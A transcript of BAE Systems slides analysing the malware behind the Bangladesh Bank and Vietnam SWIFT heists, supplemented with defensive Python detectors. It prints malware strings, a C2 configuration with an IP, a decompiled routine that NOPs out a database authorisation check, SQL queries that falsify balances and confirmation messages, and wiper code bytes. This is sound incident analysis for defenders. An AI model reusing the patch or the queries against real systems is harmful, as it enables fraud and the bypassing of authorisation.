The evolution of financial malware – Bangladesh Bank Heist Case Study
Sergei Shevchenko (Security Researcher, BAE Systems Applied Intelligence)
Copyright 2016 BAE Systems. All Rights Reserved.
Source: cyberinbusiness.com/...Shevchenko_BAE-Systems.pdf

Slide 3: strings from the samples (IDA listings)

Bangladesh sample (SWIFT Alliance Access / Oracle manipulation):

.data:0040F818  a20Transactio_0  db ' 20: Transaction',0                 ; DATA XREF: sub_406B40
.data:0040F83C  Str              db 'FEDERAL RESERVE BANK',0
.data:0040F8A4  aFin900Confirma  db 'FIN 900 Confirmation of Debit',0
.data:0040F8EC  aCmd_exeCEchoEx  db 'cmd.exe /c echo exit | "%s" VS / as sysdba @%s > "%s"',0
.data:0040F484  aSelectMesg_fin  db 'SELECT MESG_FIN_CCY_AMOUNT FROM SAAOWNER.MESG_%s WHERE MESG_S_UMI'
.data:0040F484                   db 'D = ',27h,'%s',27h,';',0
.data:0040F18C  aLiboradb_dll    db 'liboradb.dll',0                     ; DATA XREF: patch_liboradb_dll+F2o
.data:0040F0D4  aAllians         db 'Allians',0                          ; DATA XREF: make_paths+32o
.data:0040F220  aSelectC_text_s  db 'SELECT C.TEXT_S_UMID FROM (SELECT A.TEXT_S_UMID, A.TEXT_DATA_BLOC'
.data:0040F220                   db ' = B.MESG_S_UMID AND B.MESG_SENDER_SWIFT_ADDRESS LIKE ',27h,'%%%s%%',27h

Vietnam sample (PDF statement parser):

.data:0048F478  a_2i64d          db '%.2I64d',0                          ; DATA XREF: sub_45A500+6Fo
.data:0048F480  aMa              db 'Ma',0                               ; DATA XREF: sub_45A760+9Ao
.data:0048F483                   align 4
.data:0048F484  aStatementLine   db ': Statement Line',0                 ; DATA XREF: sub_45A760+5Co
.data:0048F495                   align 4
.data:0048F498  aClosingBalance  db 'Closing Balance (Booked Funds)',0   ; DATA XREF: sub_45A880+5Do
.data:0048F4B8  aPos_temp        db 'POS_TEMP',0                         ; DATA XREF: sub_45A880+36o
.data:0048F4B8                                                           ; sub_45A880+109o ...
.data:0048F4C4  asc_48F4C4       db '---------------------',0            ; DATA XREF: sub_45A9C0+D1o
.data:0048F4C4                                                           ; sub_45B630+1A0o
.data:0048F4DC  aOpeningBalance  db ' Opening Balance',0                 ; DATA XREF: sub_45AAE0:loc_45AAFBo
.data:0048F4ED                   align 10h
.data:0048F4F0  aSender          db 'Sender',0                           ; DATA XREF: sub_45AB80:loc_45ABA0o
.data:0048F4F7                   align 4
.data:0048F4F8  aS_5             db '#%s#',0                             ; DATA XREF: sub_45AC00+117o
.data:0048F4FD                   align 10h
.data:0048F500  aDebit_0         db ': Debit',0                          ; DATA XREF: sub_45AC00+E5o
.data:0048F508  aCredit          db ': Credit',0                         ; DATA XREF: sub_45AC00+CEo
.data:0048F508                                                           ; sub_45AC00+234o ...
.data:0048F511                   align 4
.data:0048F514  aDebit           db ' Debit',0                           ; DATA XREF: sub_45AC00+94o
.data:0048F51B                   align 4
.data:0048F51C  aPos_page_start  db 'POS_PAGE_START',0                   ; DATA XREF: sub_45B210+51o
.data:0048F51C                                                           ; sub_45B210+E0o ...
.data:0048F52B                   align 4
.data:0048F52C  aCredit_0        db ' Credit',0                          ; DATA XREF: sub_45B3D0+DAo
.data:0048F534  aClosingAvailBa  db ': Closing Avail Bal (Avail Funds)',0 ; DATA XREF: sub_45B630+261o
.data:0048F556                   align 4
.data:0048F558  aMessageTrailer  db 'Message Trailer',0                  ; DATA XREF: sub_45B630+1F8o
.data:0048F568  aMessageText     db 'Message Text',0                     ; DATA XREF: sub_45B630+1E2o
.data:0048F575                   align 4
.data:0048F578  aMessageHeader   db 'Message Header',0                   ; DATA XREF: sub_45B630+1CCo
.data:0048F587                   align 4
.data:0048F588  aInstanceTypeAn  db 'Instance Type and Transmission',0   ; DATA XREF: sub_45B630+1B6o
.data:0048F588                                                           ; PARSE_PDF:loc_45BBC0o

Configuration fragment:

<rpcgroup>..<rpci>..*/bbw/cmserver/*..217.172.177.12/redirect.php..<ssq>1</ssq>

Slide 4: Watering Hole Attacks

Slides 5-6: Watering Hole Attacks (continued)

1/3 out of 10 mln websites run CMS
31,581 plugins
>100 vulnerabilities fixed since 2008

Slide 7: Organised Cyber Crime > Targeting Different Levels of the Society

Ordinary People: ZeuS/Carberp, Dridex/Dyre

Slide 8: The Rise of POS Malware > ATM Malware

Early signs of such diversification efforts were noticed back in 2009.

Insiders or corrupt technical support employees infected a number of Diebold ATMs (running Windows XP), allowing the attackers to instruct the infected ATMs to dispense cash.

Slide 9: The Rise of POS Malware > POS Malware (BlackPOS etc.)

Slide 10: Organised Cyber Crime > Targeting Different Levels of the Society

ATM/POS: ATM/POS Malware

Slide 11: 2015: Carbanak, an attack from inside > Attack against a Bank Infrastructure

In 2015, a new breed of malware, Carbanak, was found and reported by Kaspersky Lab.

The malware and the group of attackers behind it were able to compromise up to 100 financial institutions from the inside.

Not only did they manage to steal information about thousands of private customers, but they were also able to remotely instruct ATMs to dispense cash, leading to substantial financial losses.

Slide 12: Organised Cyber Crime > Targeting Different Levels of the Society

Bank Infrastructure: Carbanak

Slide 13: Life imitating Art

Hollywood (2001): $150M
Cyber space (2016): $951M

Slides 14-15: Schematics of Cyber Heist > Compromised Bank Operation

(diagram labels) US BANK; Compromised Bank, Corr. Account; Offshore Bank

Slide 16: Bangladesh Bank Heist > Patch

3. Malware checks to see if any processes have the 'liboradb.dll' module loaded
4. If found, it overwrites 2 bytes at a specific offset with 'do nothing' (0x90, NOP) instructions
5. The overwritten bytes force the host application to always pass the validity check
6. The malware is now able to execute database transactions

Patch/unpatch routine (decompiled; note that the listing passes &hProcess as the
out-parameter receiving the old page protection and reuses it when restoring):

    if (VirtualProtectEx(hProcess, lpAddr, 2, PAGE_EXECUTE_READWRITE, (PDWORD)&hProcess) &&
        ReadProcessMemory(hProcess, lpAddr, &buffer, 2, &dwRead))
    {
        if (bPatch)
        {
            // original 'jnz failed' (75 04) still in place: replace it with two NOPs
            if ((WORD)buffer == JNZ)
                res = WriteProcessMemory(hProcess, lpAddr, &NOPs, 2, &dwWritten);
        }
        else
        {
            // already patched: put the original 'jnz' back
            if ((WORD)buffer == NOPs)
                res = WriteProcessMemory(hProcess, lpAddr, &JNZ, 2, &dwWritten);
        }
        if (res)
            VirtualProtectEx(hProcess, lpAddr, 2, hProcess, &flOldProtect);
    }

    .data:0040F170 NOPs    db 90h
    .data:0040F171         db 90h
    .data:0040F174 JNZ     db 75h
    .data:0040F175         db 4

Slide 17: Bangladesh Bank Heist > Patch Result

Original Code:

    85 C0             test eax, eax   ; DB authorisation check
    75 04             jnz  failed     ; if failed, jump to 'failed' label below
    33 C0             xor  eax, eax   ; otherwise, set result to 0 (success)
    EB 17             jmp  exit       ; and then exit
    failed:
    B8 01 00 00 00    mov  eax, 1     ; set result to 1 (failure)

Patched Code:

    85 C0             test eax, eax   ; DB authorisation check
    90                nop             ; 'do nothing' in place of 0x75
    90                nop             ; 'do nothing' in place of 0x04
    33 C0             xor  eax, eax   ; always set result to 0 (success)
    EB 17             jmp  exit       ; and then exit
    failed:
    B8 01 00 00 00    mov  eax, 1     ; never reached: set result to 1 (failure)

Slide 18: Bangladesh Bank Heist > Patch

(flow diagram) "Authorised?" check: YES -> Full Access to DataBase; NO -> Do Nothing. The two NOPs are literally 'do nothing' instructions, so after the patch the NO branch is never taken.

Slide 19: Bangladesh Bank Heist > Replacing the 2 bytes affects 8 bits only

    75 04  =  0111 0101  0000 0100    (jnz failed)
    90 90  =  1001 0000  1001 0000    (nop; nop)
    XOR    =  1110 0101  1001 0100    (8 bits set)

What's easier to flip? This? Or this?
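The slides show the patch from the attacker's side. The defender's side of the same two bytes is an in-memory integrity check, given here as an added example (not code from the page or from BAE Systems): compare a reference copy of the code with the bytes actually present in the process, report every short conditional jump that has become NOP NOP, and count the flipped bits. The reference and patched buffers below are transcribed from the slide's listing; in practice the reference comes from the module on disk and the live bytes from the target process (ReadProcessMemory on Windows), at an offset assumed to be known, which the example does not implement.

```python
# Bytes of the authorisation check transcribed from the slide's listing: the original
# code and the same bytes after the malware's 2-byte patch. Not read from a real
# liboradb.dll; a defender would take ORIGINAL from the module on disk and LIVE from the
# process (ReadProcessMemory on Windows) at the known offset of the check.
ORIGINAL = bytes.fromhex("85C0" "7504" "33C0" "EB17" "B801000000")
PATCHED = bytes.fromhex("85C0" "9090" "33C0" "EB17" "B801000000")

JCC_REL8 = range(0x70, 0x80)   # short conditional jumps (Jcc rel8); 0x75 is JNZ
NOP = 0x90


def changed_offsets(reference: bytes, live: bytes) -> list:
    """Offsets at which the live bytes differ from the reference copy."""
    if len(reference) != len(live):
        raise ValueError("reference and live buffers must cover the same range")
    return [i for i, (r, l) in enumerate(zip(reference, live)) if r != l]


def nopped_jumps(reference: bytes, live: bytes) -> list:
    """(offset, opcode, rel8) for each short Jcc in `reference` that is NOP NOP in `live`.

    Heuristic: any reference byte in 0x70..0x7F is taken as a Jcc opcode, so run this
    over known check sites (or disassembled code) rather than arbitrary data.
    """
    hits = []
    for i in changed_offsets(reference, live):
        if (reference[i] in JCC_REL8 and i + 1 < len(live)
                and live[i] == NOP and live[i + 1] == NOP):
            hits.append((i, reference[i], reference[i + 1]))
    return hits


def flipped_bits(reference: bytes, live: bytes) -> int:
    """Hamming distance in bits between the two buffers (8 for the slide's patch)."""
    return sum(bin(r ^ l).count("1") for r, l in zip(reference, live))


def verdict(reference: bytes, live: bytes) -> str:
    jumps = nopped_jumps(reference, live)
    if jumps:
        off, op, rel = jumps[0]
        return f"PATCHED: jcc 0x{op:02X} rel8 0x{rel:02X} at offset {off} replaced by NOP NOP"
    if changed_offsets(reference, live):
        return "MODIFIED: bytes differ but not in the NOP-out pattern"
    return "CLEAN: in-memory code matches reference"


if __name__ == "__main__":
    print(verdict(ORIGINAL, PATCHED), "/ bits flipped:", flipped_bits(ORIGINAL, PATCHED))
    print(verdict(ORIGINAL, ORIGINAL))
```

The check is cheap enough to run on a schedule against every process that has the DLL mapped, which is exactly the population the malware enumerates in step 3.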

Slide 20: Bangladesh Bank Heist > SQL queries

Manipulating balances (the amount of Convertible Currency):

    UPDATE SAAOWNER.MESG_%s SET MESG_FIN_CCY_AMOUNT = '%s' WHERE MESG_S_UMID = '%s'

Sending 'doctored' (manipulated) SWIFT confirmation messages for local printing:

    UPDATE SAAOWNER.TEXT_%s SET TEXT_DATA_BLOCK = UTL_RAW.CAST_TO_VARCHAR2('%s') WHERE TEXT_S_UMID = '%s'

Monitoring Login/Logout events in the journal:

    SELECT * FROM (SELECT JRNL_DISPLAY_TEXT, JRNL_DATE_TIME FROM SAAOWNER.JRNL_%s WHERE JRNL_DISPLAY_TEXT LIKE '%%LT BBHOBDDHA: Log%%' ORDER BY JRNL_DATE_TIME DESC) A WHERE ROWNUM = 1

'BBHOBDDH' is the SWIFT code for the Bangladesh Bank in Dhaka

GET: [C&C_server]/al?...
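The queries above were not run through the application; the cmd.exe string on slide 3 shows the malware driving sqlplus directly as an OS-authenticated SYSDBA session, with 'echo exit' piped in so it runs a script file and quits, and output redirected to a file. That command line is a detection opportunity. The following process-creation rule is an added example (not from the page or from BAE Systems): it scores command lines on the arguments rather than the binary name, since the sqlplus path in the malware's string is a format placeholder. The sample command lines are constructed, with invented paths and script names.

```python
import re

# Constructed Windows process-creation command lines (the kind Sysmon event 1 or
# Security event 4688 records). Paths and script names are invented for the example.
SAMPLE_CMDLINES = [
    r'cmd.exe /c echo exit | "C:\oracle\client\BIN\sqlplus.exe" VS / as sysdba @C:\Windows\Temp\q.sql > "C:\Windows\Temp\out.txt"',
    r'"C:\oracle\client\BIN\sqlplus.exe" saauser@saa',
    r'sqlplus.exe -S / as sysdba @C:\scripts\nightly_backup.sql',
    r'cmd.exe /c dir C:\Users',
]

INDICATORS = {
    # OS-authenticated DBA login: a bare '/' in place of user/password, then 'as sysdba'
    "os_auth_sysdba":      re.compile(r'(?:^|\s)/\s+as\s+sysdba\b', re.I),
    "sysdba":              re.compile(r'\bas\s+sysdba\b', re.I),
    # 'echo exit |' feeds an EOF so sqlplus runs the script and exits without a console
    "noninteractive_echo": re.compile(r'\becho\s+exit\s*\|', re.I),
    "script_file":         re.compile(r'(?:^|\s)@\S+'),
    "output_redirect":     re.compile(r'>\s*"?[^"\s]+'),
    "via_cmd_c":           re.compile(r'\bcmd(?:\.exe)?\s+/c\b', re.I),
    "sqlplus_binary":      re.compile(r'\bsqlplus(?:\.exe)?\b', re.I),
}


def indicators(cmdline: str) -> list:
    """Names of the indicators present in one command line, in INDICATORS order."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmdline)]


def is_suspicious(cmdline: str) -> bool:
    """Scripted, OS-authenticated SYSDBA session: the pattern of the malware's string."""
    found = set(indicators(cmdline))
    return "os_auth_sysdba" in found and bool(found & {"noninteractive_echo", "script_file"})


def triage(cmdlines) -> list:
    return [(c, indicators(c), is_suspicious(c)) for c in cmdlines]


if __name__ == "__main__":
    for cmdline, found, hit in triage(SAMPLE_CMDLINES):
        print("ALERT " if hit else "      ", found, cmdline[:60])
```

The third sample (a scheduled backup script) also fires, which is intended: legitimate SYSDBA automation on a SWIFT Alliance host should be a short, explicit allow-list keyed on parent process, account and script path, not something the rule guesses at.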

Slide 21: This was not the only heist…

Slide 22: Cyber Heist: Vietnam

(flow diagram; labels recovered from the slide)

SWIFT Service Bureau (was not compromised) -> Received PDF Statement
Fraudulent Requests

User opens the PDF File
  -> Trojan reads PDF File, converts into XML (Temporary File)
  -> XML File: read blocks one-by-one; ignore blocks with MESSAGE_FILENAME
  -> Trojan reads XML, converts into PDF -> Modified PDF File
  -> Pass Modified PDF File to Foxit Reader
  -> User opens the Modified PDF File
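In both cases the victim was shown doctored paperwork: the locally printed FIN 900 confirmations in Bangladesh (the TEXT_DATA_BLOCK update on slide 20) and the Service Bureau's PDF statements in Vietnam. The control that catches this is a reconciliation that does not trust the document itself. The following is an added example, not code from the page or from BAE Systems: it parses a constructed MT940/950-style statement (the standard :60F: opening balance, :61: statement line and :62F: closing balance tags), checks that opening balance plus entries equals the reported closing balance, and compares that closing balance with a figure obtained independently of the statement (here the constructed constant LEDGER_CLOSING, standing in for the balance queried from the correspondent). The account number, references and amounts are invented.

```python
import re
from decimal import Decimal

# Constructed MT940/950-style statement (standard tags: :60F: opening balance,
# :61: statement line, :62F: closing balance). Account, references and amounts are invented.
GENUINE = """\
:20:STMT160204-01
:25:BBHOBDDH/0123456789
:28C:35/1
:60F:C160204USD1000000000,00
:61:1602040204C250000,00NTRFNONREF//INCOMING
:61:1602040204D81000000,00NTRFNONREF//OUTGOING-1
:62F:C160204USD919250000,00
"""

# Doctored copy 1: the outgoing debit line is deleted, the closing balance is left alone.
DOCTORED_INCONSISTENT = GENUINE.replace(
    ":61:1602040204D81000000,00NTRFNONREF//OUTGOING-1\n", "")

# Doctored copy 2: the debit line is deleted and the closing balance is "fixed up" too.
DOCTORED_CONSISTENT = DOCTORED_INCONSISTENT.replace(
    ":62F:C160204USD919250000,00", ":62F:C160204USD1000250000,00")

# Closing balance obtained independently of the statement (e.g. by querying the
# correspondent directly). Constructed for the example.
LEDGER_CLOSING = Decimal("919250000.00")

BALANCE_RE = re.compile(r"^:6[02]F:([CD])(\d{6})([A-Z]{3})(\d+,\d*)$")
# :61: value date, optional entry date, D/C mark (RC/RD = reversals), optional funds
# code, amount with comma decimal, then the transaction type code (N... or S...)
ENTRY_RE = re.compile(r"^:61:(\d{6})(\d{4})?(RC|RD|C|D)[A-Z]?(\d+,\d*)[NS]")


def _signed(mark: str, amount: str) -> Decimal:
    """Credits increase the balance; debits and reversed credits decrease it."""
    value = Decimal(amount.replace(",", "."))
    return -value if mark in ("D", "RC") else value


def parse_statement(text: str) -> dict:
    stmt = {"opening": None, "entries": [], "closing": None}
    for line in text.splitlines():
        bal = BALANCE_RE.match(line)
        if bal:
            key = "opening" if line.startswith(":60") else "closing"
            stmt[key] = _signed(bal.group(1), bal.group(4))
            continue
        ent = ENTRY_RE.match(line)
        if ent:
            stmt["entries"].append(_signed(ent.group(3), ent.group(4)))
    if stmt["opening"] is None or stmt["closing"] is None:
        raise ValueError("statement lacks :60F:/:62F: balance lines")
    return stmt


def computed_closing(stmt: dict) -> Decimal:
    return stmt["opening"] + sum(stmt["entries"], Decimal(0))


def verify(text: str, ledger_closing: Decimal) -> list:
    """Findings for a statement; an empty list means both checks passed."""
    stmt = parse_statement(text)
    findings = []
    expected = computed_closing(stmt)
    if expected != stmt["closing"]:
        findings.append(f"does not reconcile: entries imply closing {expected}, "
                        f"statement reports {stmt['closing']}")
    if stmt["closing"] != ledger_closing:
        findings.append(f"closing {stmt['closing']} differs from independent ledger figure "
                        f"{ledger_closing}")
    return findings


if __name__ == "__main__":
    for name, text in (("genuine", GENUINE),
                       ("doctored, line removed", DOCTORED_INCONSISTENT),
                       ("doctored, balance adjusted", DOCTORED_CONSISTENT)):
        print(name, "->", verify(text, LEDGER_CLOSING) or "OK")
```

The first doctored copy fails the internal sum; the second is internally consistent and is only caught by the comparison against the independent figure, which is why the second check cannot be derived from anything that passed through the compromised workstation.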

Slide 23: Attribution clues…

Slide 24: Attribution clues

Distinctive 2-step 'wipe-out' and 'file-delete' functions:

---> which led to a further sample: msoutc.exe – c6eb8e46810f5806d056c4aa34e7b8d8a2c37cad

Slide 25: Attribution

Wipe-out function (msoutc.exe, 2014):

B820100000E8B64E0000535557FF150090400050FF154C90400083C404C644240CFFFF156890400025FF0000807907480D00FFFFFF408844240DB9FF03000033C08D7C242DC644242C5F33DBF3AB66AB5368800000006A0353AA8B84244010000053680000004050C644242AFF885C242BC644242C7EC644242DE7FF15A4AC40008BE883FDFF7510FF151C9040005F5D5B81C420100000C3566A02536AFF55FF15D4AC40008D4C242453518D5424386A015255FF15ACAC400055FF15C8AC4000
1EFFFFFF55FF15A8AC40008B9424341000005352E847FDFFFF83C4085E5F5D5B

Wipe-out function (Vietnam malware, 2015):

B820100000E896EA0400535557FF154CF0450050FF152CF1450083C404C644240CFFFF1524F1450025FF0000807907480D00FFFFFF408844240DB9FF03000033C08D7C242DC644242C5F33DBF3AB66AB5368800000006A0353AA8B84244010000053680000004050C644242AFF885C242BC644242C7EC644242DE7FF1548F045008BE883FDFF7510FF1508F045005F5D5B81C420100000C3566A02536AFF55FF1544F045008D4C242453518D5424386A015255FF1540F0450055FF153CF04500
1EFFFFFF55FF1510F045008B9424341000005352E847FDFFFF83C4085E5F5D5B

The code is identical; only the call targets differ (relocated rel32 / import addresses, little-endian):

    msoutc.exe (2014)    Vietnam malware (2015)
    E8 B6 4E 00 00       E8 96 EA 04 00        call rel32
    FF 15 00 90 40 00    FF 15 4C F0 45 00     call [imm32]
    FF 15 4C 90 40 00    FF 15 2C F1 45 00
    FF 15 68 90 40 00    FF 15 24 F1 45 00
    FF 15 A4 AC 40 00    FF 15 48 F0 45 00
    FF 15 1C 90 40 00    FF 15 08 F0 45 00
    FF 15 D4 AC 40 00    FF 15 44 F0 45 00
    FF 15 AC AC 40 00    FF 15 40 F0 45 00
    FF 15 C8 AC 40 00    FF 15 3C F0 45 00
    FF 15 A8 AC 40 00    FF 15 10 F0 45 00
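The slide draws the comparison by eye. Done programmatically, as an added example that is not BAE Systems' tooling, the same comparison runs over the two hex dumps printed above (in the two segments the slide shows) and attributes a run of differing bytes to relocation only when it falls inside the 4-byte operand of an E8 (call rel32) or FF 15 (call [imm32]) opcode present at the same offset in both samples; anything else is reported as a real code change. Two rebuilt copies of one function should then show zero unexplained bytes, which is the result the slide relies on.

```python
# Hex dumps of the 2-step 'wipe-out' function exactly as printed on the slide, for
# msoutc.exe (2014) and the Vietnam sample (2015). The slide shows each dump in two
# segments; they are compared segment by segment.
MSOUTC_2014 = (
    "B820100000E8B64E0000535557FF150090400050FF154C90400083C404C644240CFFFF156890400025FF0000807907480D00FFFFFF408844240DB9FF03000033C08D7C242DC644242C5F33DBF3AB66AB5368800000006A0353AA8B84244010000053680000004050C644242AFF885C242BC644242C7EC644242DE7FF15A4AC40008BE883FDFF7510FF151C9040005F5D5B81C420100000C3566A02536AFF55FF15D4AC40008D4C242453518D5424386A015255FF15ACAC400055FF15C8AC4000",
    "1EFFFFFF55FF15A8AC40008B9424341000005352E847FDFFFF83C4085E5F5D5B",
)
VIETNAM_2015 = (
    "B820100000E896EA0400535557FF154CF0450050FF152CF1450083C404C644240CFFFF1524F1450025FF0000807907480D00FFFFFF408844240DB9FF03000033C08D7C242DC644242C5F33DBF3AB66AB5368800000006A0353AA8B84244010000053680000004050C644242AFF885C242BC644242C7EC644242DE7FF1548F045008BE883FDFF7510FF1508F045005F5D5B81C420100000C3566A02536AFF55FF1544F045008D4C242453518D5424386A015255FF1540F0450055FF153CF04500",
    "1EFFFFFF55FF1510F045008B9424341000005352E847FDFFFF83C4085E5F5D5B",
)

CALL_REL32 = b"\xe8"       # call rel32   -> 4-byte displacement follows
CALL_ABS32 = b"\xff\x15"   # call [imm32] -> 4-byte import-table address follows


def differing_runs(a: bytes, b: bytes) -> list:
    """Maximal runs [start, end] of offsets at which a and b differ."""
    runs, start = [], None
    for i, (x, y) in enumerate(zip(a, b)):
        if x != y and start is None:
            start = i
        elif x == y and start is not None:
            runs.append((start, i - 1))
            start = None
    if start is not None:
        runs.append((start, len(a) - 1))
    return runs


def reloc_window(a: bytes, b: bytes, start: int, end: int):
    """(opcode_offset, operand_offset) if [start, end] lies inside the 4-byte operand of a
    CALL opcode found at the same place in both samples, else None."""
    for opcode in (CALL_REL32, CALL_ABS32):
        n = len(opcode)
        for p in range(max(0, start - n - 3), start - n + 1):
            if a[p:p + n] == opcode == b[p:p + n] and end < p + n + 4:
                return p, p + n
    return None


def compare_code(hex_a: str, hex_b: str) -> dict:
    a, b = bytes.fromhex(hex_a), bytes.fromhex(hex_b)
    if len(a) != len(b):
        raise ValueError("segments differ in length; align them first")
    report = {"total": len(a), "differing": 0, "relocated": 0,
              "unexplained": [], "operands": []}
    seen = set()
    for start, end in differing_runs(a, b):
        n = end - start + 1
        report["differing"] += n
        w = reloc_window(a, b, start, end)
        if w is None:
            report["unexplained"].append((start, end))
            continue
        report["relocated"] += n
        if w[0] not in seen:          # one entry per call even if its operand differs in 2 runs
            seen.add(w[0])
            op = w[1]
            report["operands"].append((w[0], a[op:op + 4].hex(), b[op:op + 4].hex()))
    return report


if __name__ == "__main__":
    for seg, (x, y) in enumerate(zip(MSOUTC_2014, VIETNAM_2015), 1):
        r = compare_code(x, y)
        print(f"segment {seg}: {r['total']} bytes, {r['differing']} differ, "
              f"{r['relocated']} in call operands, unexplained runs: {r['unexplained']}")
        for off, old, new in r["operands"]:
            print(f"  offset {off:3d}: {old} -> {new}")
```

The same routine generalises to any pair of samples suspected of sharing a function: a non-empty `unexplained` list is where to look for a genuine code change, while a long list of `operands` with nothing unexplained is the relocation-only picture the slide shows.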

Slide 26: Attribution

(timeline figure; labels recovered from the slide)

Sources compared: US-CERT Alert, PwC, msoutc.exe

Strings shared between the samples and the public reports:
    FwtSqmSession106829323_S-1-5-19
    FwtSqmSession106839323_S-1-5-20
    y0uar3@s!llyid!07,ou74n60u7f001
    y@s!11yid60u7f!07ou74n001

Timeline axis: DEC JAN FEB MAR APR (2015 – 2016), with Compiled / Discovered / Event marks for Vietnam and Bangladesh
Date labels: 4-Dec-2015, 8-Dec-2015, 16-Dec-2015, 22-Dec-2015, 4-Feb-2016 / 5-Feb-2016, 28-Feb-2016, 25-Mar-2016

Vietnam: Tien Phong Bank: Heist Attempt
    Samples: Foxit Reader.exe, mspdclr.exe (Trojanised Foxit Reader / SWIFT Message Cleaner)

Bangladesh: Bangladesh Bank Heist
    Samples: evtsys.exe, evtdiag.exe, nroff_b.exe (Main Malware used in Bangladesh Heist)

Slide 27: Timeline of the known attacks

Slide 28: Timeline of the attacks: Group #1 (Unknown)

Late 2014 – 2015 (Ecuador)

Malware:
• exe compiled from Python scripts:
  • pyinstaller-generated exe files
  • python scripts fetch/execute shellcode
• 'legit' remote access tools:
  • 'Atelier Web Remote Commander'
  • 'Anyplace Control'
• 'legit' Veil Framework

Slide 29: Timeline of the attacks: Group #2 (Lazarus)

Vietnam: December 2015

Malware:
• Manipulation of the PDF statements from the bank's Service Bureau

Slide 30: Timeline of the attacks: Group #2 (Lazarus)

Bangladesh: February 2016

Malware:
• SWIFT messages manipulation
• Compromises SWIFT Alliance Software
• Direct DB manipulation

Slide 31: Timeline of the attacks: Group #3 (Carbanak)

April 2016 (Ukraine, Hong Kong, Taiwan (China), Thailand)

Infection Vector:
• Spear-Phishing, RIG Exploit Kit

Malware:
• MBR code, wipes out HDD
• Backdoor shellcode, port 8888 (open source)
• "Toshliph": links to Carbanak

Targets:
• ATMs
• E-payment systems
• online banking

Slide 32: We're now working with SWIFT to investigate new cases

Slide 33: Thank You.